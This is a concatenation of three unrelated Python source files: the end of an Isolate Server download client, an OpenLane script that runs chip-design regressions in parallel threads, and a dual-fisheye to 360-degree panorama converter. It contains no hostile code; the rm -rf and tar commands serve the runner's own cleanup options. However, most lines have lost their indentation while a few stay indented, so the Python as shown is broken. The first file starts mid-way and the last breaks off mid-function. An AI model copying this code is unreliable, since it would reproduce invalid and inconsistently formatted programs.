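#   # Fetch a whole tree described by an .isolated hash into ./out:
#   python isolateserver.py download -I https://isolate.example.com \
#       -s deadbeefdeadbeefdeadbeefdeadbeefdeadbeef -t ./out
#
#   # Fetch two individual files by hash:
#   python isolateserver.py download -I https://isolate.example.com \
#       -f deadbeefdeadbeefdeadbeefdeadbeefdeadbeef payload.bin \
#       -f cafebabecafebabecafebabecafebabecafebabe data.json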
def add_archive_options(parser):
parser.add_option(
'--blacklist',
action='append', default=list(DEFAULT_BLACKLIST),
help='List of regexp to use as blacklist filter when uploading '
'directories')
def add_isolate_server_options(parser):
"""Adds --isolate-server and --namespace options to parser."""
parser.add_option(
'-I', '--isolate-server',
metavar='URL', default=os.environ.get('ISOLATE_SERVER', ''),
help='URL of the Isolate Server to use. Defaults to the environment '
'variable ISOLATE_SERVER if set. No need to specify https://, this '
'is assumed.')
parser.add_option(
'--grpc-proxy', help='gRPC proxy by which to communicate to Isolate')
parser.add_option(
'--namespace', default='default-gzip',
help='The namespace to use on the Isolate Server, default: %default')
def process_isolate_server_options(
parser, options, set_exception_handler, required):
"""Processes the --isolate-server option.
Returns the identity as determined by the server.
"""
if not options.isolate_server:
if required:
parser.error('--isolate-server is required.')
return
if options.grpc_proxy:
isolate_storage.set_grpc_proxy(options.grpc_proxy)
else:
try:
options.isolate_server = net.fix_url(options.isolate_server)
except ValueError as e:
parser.error('--isolate-server %s' % e)
if set_exception_handler:
on_error.report_on_exception_exit(options.isolate_server)
try:
return auth.ensure_logged_in(options.isolate_server)
except ValueError as e:
parser.error(str(e))
return None
def add_cache_options(parser):
cache_group = optparse.OptionGroup(parser, 'Cache management')
cache_group.add_option(
'--cache', metavar='DIR', default='cache',
help='Directory to keep a local cache of the files. Accelerates download '
'by reusing already downloaded files. Default=%default')
cache_group.add_option(
'--max-cache-size',
type='int',
metavar='NNN',
default=50*1024*1024*1024,
help='Trim if the cache gets larger than this value, default=%default')
cache_group.add_option(
'--min-free-space',
type='int',
metavar='NNN',
default=2*1024*1024*1024,
help='Trim if disk free space becomes lower than this value, '
'default=%default')
cache_group.add_option(
'--max-items',
type='int',
metavar='NNN',
default=100000,
help='Trim if more than this number of items are in the cache '
'default=%default')
parser.add_option_group(cache_group)
def process_cache_options(options, trim, **kwargs):
if options.cache:
policies = local_caching.CachePolicies(
options.max_cache_size,
options.min_free_space,
options.max_items,
# 3 weeks.
max_age_secs=21*24*60*60)
# |options.cache| path may not exist until DiskContentAddressedCache()
# instance is created.
return local_caching.DiskContentAddressedCache(
six.text_type(os.path.abspath(options.cache)), policies, trim, **kwargs)
return local_caching.MemoryContentAddressedCache()
class OptionParserIsolateServer(logging_utils.OptionParserWithLogging):
def __init__(self, **kwargs):
logging_utils.OptionParserWithLogging.__init__(
self,
version=__version__,
prog=os.path.basename(sys.modules[__name__].__file__),
**kwargs)
auth.add_auth_options(self)
def parse_args(self, *args, **kwargs):
options, args = logging_utils.OptionParserWithLogging.parse_args(
self, *args, **kwargs)
auth.process_auth_options(self, options)
return options, args
def main(args):
dispatcher = subcommand.CommandDispatcher(__name__)
return dispatcher.execute(OptionParserIsolateServer(), args)
if __name__ == '__main__':
subprocess42.inhibit_os_error_reporting()
fix_encoding.fix_encoding()
tools.disable_buffering()
colorama.init()
sys.exit(main(sys.argv[1:]))
|
run_designs.py
|
# Copyright 2020 Efabless Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import copy
import time
import queue
import logging
import datetime
import argparse
import threading
import subprocess
from collections import OrderedDict
from scripts.report.report import Report
from scripts.config.config import ConfigHandler
import scripts.utils.utils as utils
parser = argparse.ArgumentParser(description="Run multiple designs in parallel, for testing or exploration.")
parser.add_argument(
"--config_tag", "-c", action="store", default="config", help="config file"
)
parser.add_argument(
"--regression", "-r", action="store", default=None, help="regression file"
)
parser.add_argument(
"--designs", "-d", nargs="+", default=["spm"], help="designs to run"
)
parser.add_argument(
"--tag", "-t", action="store", default="regression", help="tag the log file"
)
parser.add_argument(
"--threads",
"-th",
action="store",
type=int,
default=5,
help="number of designs in parallel",
)
parser.add_argument(
"--configuration_parameters",
"-cp",
action="store",
default=None,
help="file containing configuration parameters to write in report, to report all possible configurations add: all ",
)
parser.add_argument(
"--append_configurations",
"-app",
action="store_true",
default=False,
help="append configuration parameters provided to the existing default printed configurations",
)
parser.add_argument(
"--clean",
"-cl",
action="store_true",
default=False,
help="cleans all intermediate files in runs",
)
parser.add_argument(
"--delete",
"-dl",
action="store_true",
default=False,
help="deletes the whole run directory upon completion leaving only the final_report.txt file",
)
parser.add_argument(
"--tarList",
"-tar",
nargs="+",
default=None,
help="tars the specified sub directories and deletes the whole directory leaving only the compressed version",
)
parser.add_argument(
"--htmlExtract",
"-html",
action="store_true",
default=False,
help="An option to extract an html summary of the final csv summary",
)
parser.add_argument(
"--defaultTestSet",
"-dts",
action="store_true",
default=False,
help="Runs the default test set (all designs under ./designs/) to generate the regression sheet",
)
parser.add_argument(
"--excluded_designs",
"-e",
nargs="+",
default=[],
help="designs to exclude from the run",
)
parser.add_argument(
"--benchmark",
"-b",
action="store",
default=None,
help="benchmark report file to compare with",
)
parser.add_argument(
"--print_rem",
"-p",
action="store",
default=None,
help="Takes a time period, and prints the list of remaining designs periodically based on it",
)
parser.add_argument(
"--disable_timestamp",
"-dt",
action="store_true",
default=False,
help="Disables appending the timestamp to the file names and tags.",
)
parser.add_argument(
"--show_output",
"-so",
action="store_true",
default=False,
help="Enables showing the ./flow.tcl output into the stdout. If more than one design/more than one configuration is run, this flag will be treated as False, even if specified otherwise.",
)
args = parser.parse_args()
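# Illustrative invocations only (the design names, regression file and benchmark
# file below are placeholders, not shipped with this script):
#
#   python3 run_designs.py --designs spm --tag smoke_test --threads 3
#   python3 run_designs.py --defaultTestSet --regression <regression_file> \
#       --benchmark <benchmark.csv> --htmlExtract --delete
#
# Each selected design is pushed onto a queue and consumed by the worker
# threads created further below.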
regression = args.regression
tag = args.tag
if args.defaultTestSet:
    # Keep only sub-directories. Filtering in a single pass avoids removing
    # items from a list while iterating over it, which skips entries.
    designs = [x for x in os.listdir("./designs/") if os.path.isdir("./designs/" + x)]
else:
designs = list(OrderedDict.fromkeys(args.designs))
excluded_designs = list(OrderedDict.fromkeys(args.excluded_designs))
for excluded_design in excluded_designs:
if excluded_design in designs:
designs.remove(excluded_design)
show_log_output = args.show_output and (len(designs) == 1) and (args.regression is None)
if args.print_rem is not None and not show_log_output:
if float(args.print_rem) > 0:
mutex = threading.Lock()
print_rem_time = float(args.print_rem)
else:
print_rem_time = None
else:
print_rem_time = None
if print_rem_time is not None:
rem_designs = dict.fromkeys(designs, 1)
num_workers = args.threads
config = args.config_tag
tarList = [""]
if args.tarList is not None:
tarList = list(OrderedDict.fromkeys(args.tarList))
if args.regression is not None:
regressionConfigurationsList = []
regressionFileOpener = open(regression, "r")
regressionFileContent = regressionFileOpener.read().split()
regressionFileOpener.close()
for k in regressionFileContent:
if k.find("=") == -1:
continue
if k.find("extra") != -1:
break
else:
regressionConfigurationsList.append(k.split("=")[0])
if len(regressionConfigurationsList):
ConfigHandler.update_configuration_values(regressionConfigurationsList, True)
if args.configuration_parameters is not None:
if args.configuration_parameters == "all":
ConfigHandler.update_configuration_values_to_all(args.append_configurations)
else:
try:
            with open(args.configuration_parameters, "r") as tmpFile:
                configuration_parameters = tmpFile.read().split(",")
                ConfigHandler.update_configuration_values(
                    configuration_parameters, args.append_configurations
                )
except OSError:
print("Could not open/read file:", args.configuration_parameters)
sys.exit()
store_dir = ""
report_file_name = ""
if args.disable_timestamp:
store_dir = "./regression_results/{tag}/".format(tag=tag)
report_file_name = "{store_dir}/{tag}".format(store_dir=store_dir, tag=tag)
else:
store_dir = "./regression_results/{tag}_{date}/".format(
tag=tag, date=datetime.datetime.now().strftime("%d_%m_%Y_%H_%M")
)
report_file_name = "{store_dir}/{tag}_{date}".format(
store_dir=store_dir,
tag=tag,
date=datetime.datetime.now().strftime("%d_%m_%Y_%H_%M"),
)
if not os.path.exists(store_dir):
os.makedirs(store_dir, exist_ok=True)
log = logging.getLogger("log")
log_formatter = logging.Formatter("[%(asctime)s - %(levelname)5s] %(message)s")
handler1 = logging.FileHandler(
"{report_file_name}.log".format(report_file_name=report_file_name), "w"
)
handler1.setFormatter(log_formatter)
log.addHandler(handler1)
handler2 = logging.StreamHandler()
handler2.setFormatter(log_formatter)
log.addHandler(handler2)
log.setLevel(logging.INFO)
report_log = logging.getLogger("report_log")
report_formatter = logging.Formatter("%(message)s")
report_handler = logging.FileHandler(
"{report_file_name}.csv".format(report_file_name=report_file_name), "w"
)
report_handler.setFormatter(report_formatter)
report_log.addHandler(report_handler)
report_log.setLevel(logging.INFO)
report_log.info(Report.get_header() + "," + ConfigHandler.get_header())
allow_print_rem_designs = False
def printRemDesignList():
t = threading.Timer(print_rem_time, printRemDesignList)
t.start()
if allow_print_rem_designs:
print("Remaining designs (design, # of times): ", rem_designs)
if len(rem_designs) == 0:
t.cancel()
def rmDesignFromPrintList(design):
if design in rem_designs.keys():
mutex.acquire()
try:
rem_designs[design] -= 1
if rem_designs[design] == 0:
rem_designs.pop(design)
finally:
mutex.release()
if print_rem_time is not None:
printRemDesignList()
allow_print_rem_designs = True
def run_design(designs_queue):
while not designs_queue.empty():
        try:
            design, config, tag, design_name = designs_queue.get(timeout=3)  # 3s timeout
        except queue.Empty:
            # Another worker drained the queue between the empty() check and get().
            break
run_path = utils.get_run_path(design=design, tag=tag)
log.info("{design} {tag} running".format(design=design, tag=tag))
command = ""
if show_log_output:
command = "{ol_entry} -design {design} -tag {tag} -overwrite -config_tag {config} -no_save".format(
ol_entry=os.getenv("OPENLANE_ENTRY") or "./flow.tcl",
design=design,
tag=tag,
config=config,
)
else:
command = "{ol_entry} -design {design} -tag {tag} -overwrite -disable_output -config_tag {config} -no_save".format(
ol_entry=os.getenv("OPENLANE_ENTRY") or "./flow.tcl",
design=design,
tag=tag,
config=config,
)
skip_rm_from_rems = False
try:
if show_log_output:
process = subprocess.Popen(
command.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE
)
while True:
output = process.stdout.readline()
if not output:
break
if output:
print(str(output.strip())[2:-1])
else:
subprocess.check_output(command.split(), stderr=subprocess.PIPE)
except subprocess.CalledProcessError as e:
if print_rem_time is not None:
rmDesignFromPrintList(design)
skip_rm_from_rems = True
error_msg = e.stderr.decode(sys.getfilesystemencoding())
            log.error(
                "{design} {tag} failed; check {run_path}error.txt".format(
                    design=design, run_path=run_path, tag=tag
                )
            )
with open(run_path + "error.txt", "w") as error_file:
error_file.write(error_msg)
if print_rem_time is not None and not skip_rm_from_rems:
rmDesignFromPrintList(design)
log.info(
"{design} {tag} finished\t Writing report...".format(design=design, tag=tag)
)
params = ConfigHandler.get_config(design, tag)
report = Report(design, tag, design_name, params).get_report()
report_log.info(report)
with open(run_path + "final_report.txt", "w") as report_file:
report_file.write(Report.get_header() + "," + ConfigHandler.get_header())
report_file.write("\n")
report_file.write(report)
if args.benchmark is not None:
try:
log.info(
"{design} {tag} Comparing with benchmark results...".format(
design=design, tag=tag
)
)
design_benchmark_comp_cmd = "python3 scripts/compare_regression_design.py -b {benchmark} -r {this_run} -o {output_report} -d {design} -rp {run_path}".format(
benchmark=args.benchmark,
this_run=report_file_name + ".csv",
output_report=report_file_name + "_design_test_report.csv",
design=design,
run_path=run_path,
)
subprocess.check_output(design_benchmark_comp_cmd.split())
except subprocess.CalledProcessError as e:
error_msg = e.stderr.decode(sys.getfilesystemencoding())
log.error(
"{design} {tag} failed to compare with benchmark: {error_msg}".format(
design=design, tag=tag, error_msg=error_msg
)
)
if args.clean:
try:
log.info(
"{design} {tag} Cleaning tmp/...".format(
design=design, tag=tag
)
)
moveUnPadded_cmd = (
"cp {run_path}/tmp/merged_unpadded.lef {run_path}/results/".format(
run_path=run_path, tag=tag
)
)
subprocess.check_output(moveUnPadded_cmd.split())
clean_cmd = "rm -rf {run_path}/tmp/".format(run_path=run_path, tag=tag)
subprocess.check_output(clean_cmd.split())
log.info(
"{design} {tag} tmp/ cleaned.".format(
design=design, tag=tag
)
)
except subprocess.CalledProcessError as e:
error_msg = e.stderr.decode(sys.getfilesystemencoding())
log.error(
"{design} {tag} failed to clean the tmp directory: {error_msg}".format(
design=design, tag=tag, error_msg=error_msg
)
)
if tarList[0] != "":
log.info(
"{design} {tag} Compressing run directory...".format(
design=design, tag=tag
)
)
try:
if "all" in tarList:
tarAll_cmd = "tar -cvzf {run_path}../{design_name}_{tag}.tar.gz {run_path}".format(
run_path=run_path, design_name=design_name, tag=tag
)
subprocess.check_output(tarAll_cmd.split())
else:
tarString = "tar -cvzf {run_path}../{design_name}_{tag}.tar.gz"
for dirc in tarList:
tarString += " {run_path}" + dirc
tar_cmd = tarString.format(
run_path=run_path, design_name=design_name, tag=tag
)
subprocess.check_output(tar_cmd.split())
log.info(
"{design} {tag} Compressing Run Directory Finished".format(
design=design, tag=tag
)
)
except subprocess.CalledProcessError as e:
log.info(
"{design} {tag} Compressing Run Directory Failed".format(
design=design, tag=tag
)
)
if args.delete:
try:
log.info(
"{design} {tag} Deleting run directory...".format(
design=design, tag=tag
)
)
deleteDirectory = "rm -rf {run_path}".format(run_path=run_path)
subprocess.check_output(deleteDirectory.split())
log.info(
"{design} {tag} Run directory deleted.".format(
design=design, tag=tag
)
)
except subprocess.CalledProcessError as e:
error_msg = e.stderr.decode(sys.getfilesystemencoding())
log.error(
"{design} {tag} failed to delete the run directory: {error_msg}".format(
design=design, tag=tag, error_msg=error_msg
)
)
que = queue.Queue()
total_runs = 0
if regression is not None:
regression_file = os.path.join(os.getcwd(), regression)
number_of_configs = 0
for design in designs:
base_path = utils.get_design_path(design=design)
if base_path is None:
log.error("{design} not found, skipping...".format(design=design))
if print_rem_time is not None:
if design in rem_designs.keys():
rem_designs.pop(design)
continue
design_name = utils.get_design_name(design, config)
if design_name.startswith("[INVALID]:"):
            log.error(
                "{design} will not run, {reason}".format(
                    design=design, reason=design_name
                )
            )
continue
base_config_path = base_path + "base_config.tcl"
ConfigHandler.gen_base_config(design, base_config_path)
gen_config_cmd = "./scripts/config/generate_config.sh {base_config} {output_path} config_{tag} {regression_file}".format(
base_config=base_config_path,
output_path=base_path,
tag=tag,
regression_file=regression_file,
)
number_of_configs = subprocess.check_output(gen_config_cmd.split())
number_of_configs = int(number_of_configs.decode(sys.getdefaultencoding()))
total_runs = total_runs + number_of_configs
if print_rem_time is not None:
rem_designs[design] = number_of_configs
for i in range(number_of_configs):
config_tag = "config_{tag}_{idx}".format(tag=tag, idx=i)
config_file = "{base_path}/{config_tag}".format(
base_path=base_path,
config_tag=config_tag,
)
que.put((design, config_tag, config_tag, design_name))
else:
for design in designs:
base_path = utils.get_design_path(design=design)
if base_path is None:
log.error("{design} not found, skipping...".format(design=design))
if print_rem_time is not None:
if design in rem_designs.keys():
rem_designs.pop(design)
continue
default_config_tag = "config_{tag}".format(tag=tag)
design_name = utils.get_design_name(design, config)
if design_name.startswith("[INVALID]:"):
            log.error(
                "{design} will not run, {reason}".format(
                    design=design, reason=design_name
                )
            )
continue
que.put((design, config, default_config_tag, design_name))
workers = []
for i in range(num_workers):
workers.append(threading.Thread(target=run_design, args=(que,)))
workers[i].start()
for i in range(num_workers):
    while workers[i].is_alive():
workers[i].join(100)
print("Exiting thread", i)
log.info("Getting top results...")
best_result_cmd = "python3 ./scripts/report/get_best.py -i {input} -o {output}".format(
input=report_handler.baseFilename, output=report_file_name + "_best.csv"
)
subprocess.check_output(best_result_cmd.split())
if args.htmlExtract:
log.info("Creating HTML report...")
csv2html_result_cmd = (
"python3 ./scripts/csv2html/csv2html.py -i {input} -o {output}".format(
input=report_file_name + ".csv", output=report_file_name + ".html"
)
)
subprocess.check_output(csv2html_result_cmd.split())
csv2besthtml_result_cmd = (
"python3 ./scripts/csv2html/csv2html.py -i {input} -o {output}".format(
input=report_file_name + "_best.csv", output=report_file_name + "_best.html"
)
)
subprocess.check_output(csv2besthtml_result_cmd.split())
utils.addComputedStatistics(report_file_name + ".csv")
utils.addComputedStatistics(report_file_name + "_best.csv")
if args.benchmark is not None:
log.info("Benchmarking...")
full_benchmark_comp_cmd = "python3 scripts/compare_regression_reports.py -ur -b {benchmark} -r {this_run} -o {output_report} -x {output_xlsx}".format(
benchmark=args.benchmark,
this_run=report_file_name + ".csv",
output_report=report_file_name + "_benchmark_written_report.rpt",
output_xlsx=report_file_name + "_benchmark_final_report.xlsx",
)
subprocess.check_output(full_benchmark_comp_cmd.split())
log.info("Done")
|
fisheye.py
|
# -*- coding: utf-8 -*-
# Dual-fisheye to 360-photo conversion tool
# Supports equirectangular and cubemap output formats
#
# Usage instructions:
# python fisheye.py
# Start interactive alignment GUI.
# python fisheye.py -help
# Print this help message.
# python fisheye.py lens.cfg in1.jpg in2.jpg gui
# Launch interactive GUI with specified default options
# python fisheye.py lens.cfg in1.jpg in2.jpg rect=out.png
# Render and save equirectangular panorama using specified
# lens configuration and source images.
# python fisheye.py lens.cfg in1.jpg in2.jpg cube=out.png
# Render and save cubemap panorama using specified
# lens configuration and source images.
#
# Copyright (c) 2016 Alexander C. Utter
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import json
import numpy as np
import Tkinter as tk
import tkFileDialog
import tkMessageBox
import sys
import traceback
from copy import deepcopy
from math import pi
from PIL import Image, ImageTk
from scipy.optimize import minimize
from threading import Thread
# Create rotation matrix from an arbitrary quaternion. See also:
# https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation#Conversion_to_and_from_the_matrix_representation
def get_rotation_matrix(qq):
# Normalize matrix and extract individual items.
qq_norm = np.sqrt(np.sum(np.square(qq)))
w = qq[0] / qq_norm
x = qq[1] / qq_norm
y = qq[2] / qq_norm
z = qq[3] / qq_norm
# Convert to rotation matrix.
return np.matrix([[w*w+x*x-y*y-z*z, 2*x*y-2*w*z, 2*x*z+2*w*y],
[2*x*y+2*w*z, w*w-x*x+y*y-z*z, 2*y*z-2*w*x],
[2*x*z-2*w*y, 2*y*z+2*w*x, w*w-x*x-y*y+z*z]], dtype='float32')
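# Worked example (follows directly from the formula above): the identity
# quaternion [1,0,0,0] yields the 3x3 identity matrix, while the default
# "back lens" orientation [0,0,1,0] used later in this file corresponds to a
# 180-degree rotation about +Y, mapping the +X axis to -X.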
# Conjugate a quaternion to apply the opposite rotation.
def conj_qq(qq):
return np.array([qq[0], -qq[1], -qq[2], -qq[3]])
# Multiply two quaternions: ab = (a0*b0 - av . bv; a0*bv + b0*av + av x bv)
# https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation#Conversion_to_and_from_the_matrix_representation
def mul_qq(qa, qb):
return np.array([qa[0]*qb[0] - qa[1]*qb[1] - qa[2]*qb[2] - qa[3]*qb[3],
qa[0]*qb[1] + qa[1]*qb[0] + qa[2]*qb[3] - qa[3]*qb[2],
qa[0]*qb[2] + qa[2]*qb[0] + qa[3]*qb[1] - qa[1]*qb[3],
qa[0]*qb[3] + qa[3]*qb[0] + qa[1]*qb[2] - qa[2]*qb[1]])
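# Worked example: mul_qq(q, [1,0,0,0]) returns q unchanged, and for a unit
# quaternion q, mul_qq(q, conj_qq(q)) evaluates to [1,0,0,0], the identity
# rotation. (Both follow directly from the product formula above.)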
# Generate a normalized quaternion [W,X,Y,Z] from [X,Y,Z]
def norm_qq(x, y, z):
rsq = x**2 + y**2 + z**2
if rsq < 1:
w = np.sqrt(1-rsq)
return [w, x, y, z]
else:
r = np.sqrt(rsq)
return [0, x/r, y/r, z/r]
# Return length of every column in an MxN matrix.
def matrix_len(x):
#return np.sqrt(np.sum(np.square(x), axis=0))
return np.linalg.norm(x, axis=0)
# Normalize an MxN matrix such that all N columns have unit length.
def matrix_norm(x):
return x / (matrix_len(x) + 1e-9)
# Parameters for a fisheye lens, including its orientation.
class FisheyeLens:
def __init__(self, rows=1024, cols=1024):
# Fisheye lens parameters.
self.fov_deg = 180
self.radius_px = min(rows,cols) / 2
# Pixel coordinates of the optical axis (X,Y).
self.center_px = np.matrix([[cols/2], [rows/2]])
        # Quaternion mapping the intended optical axis to the actual optical axis.
self.center_qq = [1, 0, 0, 0]
def downsample(self, dsamp):
self.radius_px /= dsamp
self.center_px /= dsamp
def get_x(self):
return np.asscalar(self.center_px[0])
def get_y(self):
return np.asscalar(self.center_px[1])
def to_dict(self):
return {'cx':self.get_x(),
'cy':self.get_y(),
'cr':self.radius_px,
'cf':self.fov_deg,
'qw':self.center_qq[0],
'qx':self.center_qq[1],
'qy':self.center_qq[2],
'qz':self.center_qq[3]}
def from_dict(self, data):
self.center_px[0] = data['cx']
self.center_px[1] = data['cy']
self.radius_px = data['cr']
self.fov_deg = data['cf']
self.center_qq[0] = data['qw']
self.center_qq[1] = data['qx']
self.center_qq[2] = data['qy']
self.center_qq[3] = data['qz']
# Load or save lens configuration and alignment.
def load_config(file_obj, lens1, lens2):
[data1, data2] = json.load(file_obj)
lens1.from_dict(data1)
lens2.from_dict(data2)
def save_config(file_obj, lens1, lens2):
data = [lens1.to_dict(), lens2.to_dict()]
json.dump(data, file_obj, indent=2, sort_keys=True)
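# For reference, the configuration file written by save_config() is a JSON list
# with one dictionary per lens, keyed as in FisheyeLens.to_dict(). The numbers
# below are illustrative placeholders, not calibrated values:
#
#   [
#     {"cf": 190.0, "cr": 480, "cx": 512, "cy": 512,
#      "qw": 1, "qx": 0, "qy": 0, "qz": 0},
#     {"cf": 190.0, "cr": 480, "cx": 512, "cy": 512,
#      "qw": 0, "qx": 0, "qy": 1, "qz": 0}
#   ]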
# Fisheye source image, with lens and rotation parameters.
# Contains functions for extracting pixel data given direction vectors.
class FisheyeImage:
# Load image file and set default parameters
def __init__(self, src_file, lens=None):
# Load the image file, and convert to a numpy matrix.
self._update_img(Image.open(src_file))
# Set lens parameters.
if lens is None:
self.lens = FisheyeLens(self.rows, self.cols)
else:
self.lens = lens
# Update image matrix and corresponding size variables.
def _update_img(self, img):
self.img = np.array(img)
self.rows = self.img.shape[0]
self.cols = self.img.shape[1]
self.clrs = self.img.shape[2]
# Shrink source image and adjust lens accordingly.
def downsample(self, dsamp):
# Adjust lens parameters.
self.lens.downsample(dsamp)
# Determine the new image dimensions.
# Note: PIL uses cols, rows whereas numpy uses rows, cols
shape = (self.img.shape[1] / dsamp, # Cols
self.img.shape[0] / dsamp) # Rows
# Convert matrix back to PIL Image and resample.
img = Image.fromarray(self.img)
img.thumbnail(shape, Image.BICUBIC)
# Convert back and update size.
self._update_img(img)
# Given an 3xN array of "XYZ" vectors in panorama space (+X = Front),
# convert each ray to 2xN coordinates in "UV" fisheye image space.
def get_uv(self, xyz_vec):
# Extract lens parameters of interest.
fov_rad = self.lens.fov_deg * pi / 180
fov_scale = np.float32(2 * self.lens.radius_px / fov_rad)
# Normalize the input vector and rotate to match lens reference axes.
xyz_rot = get_rotation_matrix(self.lens.center_qq) * matrix_norm(xyz_vec)
# Convert to polar coordinates relative to lens boresight.
# (In lens coordinates, unit vector's X axis gives boresight angle;
# normalize Y/Z to get a planar unit vector for the bearing.)
# Note: Image +Y maps to 3D +Y, and image +X maps to 3D +Z.
theta_rad = np.arccos(xyz_rot[0,:])
proj_vec = matrix_norm(np.concatenate((xyz_rot[2,:], xyz_rot[1,:])))
# Fisheye lens maps 3D angle to focal-plane radius.
# TODO: Do we need a better model for lens distortion?
rad_px = theta_rad * fov_scale
# Convert back to focal-plane rectangular coordinates.
uv = np.multiply(rad_px, proj_vec) + self.lens.center_px
return np.asarray(uv + 0.5, dtype=int)
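    # Worked example of the mapping above: for a lens at the default
    # orientation (center_qq = [1,0,0,0]), the panorama-front ray [1,0,0] has
    # theta = 0 and therefore lands exactly on the lens center pixel, while
    # rays at the edge of the field of view land radius_px away from it.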
# Given an 2xN array of UV pixel coordinates, check if each pixel is
# within the fisheye field of view. Returns N-element boolean mask.
def get_mask(self, uv_px):
# Check whether each coordinate is within outer image bounds,
# and within the illuminated area under the fisheye lens.
x_mask = np.logical_and(0 <= uv_px[0], uv_px[0] < self.cols)
y_mask = np.logical_and(0 <= uv_px[1], uv_px[1] < self.rows)
# Check whether each coordinate is within the illuminated area.
r_mask = matrix_len(uv_px - self.lens.center_px) < self.lens.radius_px
# All three checks must pass to be considered visible.
all_mask = np.logical_and(r_mask, np.logical_and(x_mask, y_mask))
return np.squeeze(np.asarray(all_mask))
# Given an 2xN array of UV pixel coordinates, return a weight score
# that is proportional to the distance from the edge.
def get_weight(self, uv_px):
mm = self.get_mask(uv_px)
rr = self.lens.radius_px - matrix_len(uv_px - self.lens.center_px)
rr[~mm] = 0
return rr
# Given a 2xN array of UV pixel coordinates, return the value of each
# corresponding pixel. Output format is Nx1 (grayscale) or Nx3 (color).
# Pixels outside the fisheye's field of view are pure black (0) or (0,0,0).
def get_pixels(self, uv_px):
# Create output array with default pixel values.
pcount = uv_px.shape[1]
result = np.zeros((pcount, self.clrs), dtype=self.img.dtype)
# Overwrite in-bounds pixels as specified above.
self.add_pixels(uv_px, result)
return result
# Given a 2xN array of UV pixel coordinates, write the value of each
# corresponding pixel to the linearized input/output image (Nx3).
# Several weighting modes are available.
def add_pixels(self, uv_px, img1d, weight=None):
# Lookup row & column for each in-bounds coordinate.
mask = self.get_mask(uv_px)
xx = uv_px[0,mask]
yy = uv_px[1,mask]
# Update matrix according to assigned weight.
if weight is None:
img1d[mask] = self.img[yy,xx]
elif np.isscalar(weight):
img1d[mask] += self.img[yy,xx] * weight
else:
w1 = np.asmatrix(weight, dtype='float32')
w3 = w1.transpose() * np.ones((1,3))
img1d[mask] += np.multiply(self.img[yy,xx], w3[mask])
# A panorama image made from several FisheyeImage sources.
# TODO: Add support for supersampled anti-aliasing filters.
class PanoramaImage:
def __init__(self, src_list):
self.debug = True
self.sources = src_list
self.dtype = self.sources[0].img.dtype
self.clrs = self.sources[0].clrs
# Downsample each source image.
def downsample(self, dsamp):
for src in self.sources:
src.downsample(dsamp)
# Return a list of 'mode' strings suitable for render_xx() methods.
def get_render_modes(self):
return ['overwrite', 'align', 'blend']
# Retrieve a scaled copy of lens parameters for the Nth source.
def scale_lens(self, idx, scale=None):
temp = deepcopy(self.sources[idx].lens)
temp.downsample(1.0 / scale)
return temp
# Using current settings as an initial guess, use an iterative optimizer
# to better align the source images. Adjusts FOV of each lens, as well
# as the rotation quaternions for all lenses except the first.
# TODO: Implement a higher-order loop that iterates this step with
# progressively higher resolution. (See also: create_panorama)
# TODO: Find a better scoring heuristic. Present solution always
# converges on either FOV=0 or FOV=9999, depending on wt_pixel.
def optimize(self, psize=256, wt_pixel=1000, wt_blank=1000):
# Precalculate raster-order XYZ coordinates at given resolution.
[xyz, rows, cols] = self._get_equirectangular_raster(psize)
# Scoring function gives bonus points per overlapping pixel.
score = lambda svec: self._score(svec, xyz, wt_pixel, wt_blank)
# Multivariable optimization using gradient-descent or similar.
# https://docs.scipy.org/doc/scipy/reference/tutorial/optimize.html
svec0 = self._get_state_vector()
final = minimize(score, svec0, method='Nelder-Mead',
options={'xtol':1e-4, 'disp':True})
# Store final lens parameters.
self._set_state_vector(final.x)
# Render combined panorama in equirectangular projection mode.
# See also: https://en.wikipedia.org/wiki/Equirectangular_projection
def render_equirectangular(self, out_size, mode='blend'):
# Render the entire output in a single pass.
[xyz, rows, cols] = self._get_equirectangular_raster(out_size)
return Image.fromarray(self._render(xyz, rows, cols, mode))
# Render combined panorama in cubemap projection mode.
# See also: https://en.wikipedia.org/wiki/Cube_mapping
def render_cubemap(self, out_size, mode='blend'):
# Create coordinate arrays.
cvec = np.arange(out_size, dtype='float32') - out_size/2 # Coordinate range [-S/2, S/2)
vec0 = np.ones(out_size*out_size, dtype='float32') * out_size/2 # Constant vector +S/2
vec1 = np.repeat(cvec, out_size) # Increment every N steps
vec2 = np.tile(cvec, out_size) # Sweep N times
# Create XYZ coordinate vectors and render each cubemap face.
render = lambda(xyz): self._render(xyz, out_size, out_size, mode)
xm = render(np.matrix([-vec0, vec1, vec2])) # -X face
xp = render(np.matrix([vec0, vec1, -vec2])) # +X face
ym = render(np.matrix([-vec1, -vec0, vec2])) # -Y face
yp = render(np.matrix([vec1, vec0, vec2])) # +Y face
zm = render(np.matrix([-vec2, vec1, -vec0])) # -Z face
zp = render(np.matrix([vec2, vec1, vec0])) # +Z face
# Concatenate the individual faces in canonical order:
# https://en.wikipedia.org/wiki/Cube_mapping#Memory_Addressing
img_mat = np.concatenate([zp, zm, ym, yp, xm, xp], axis=0)
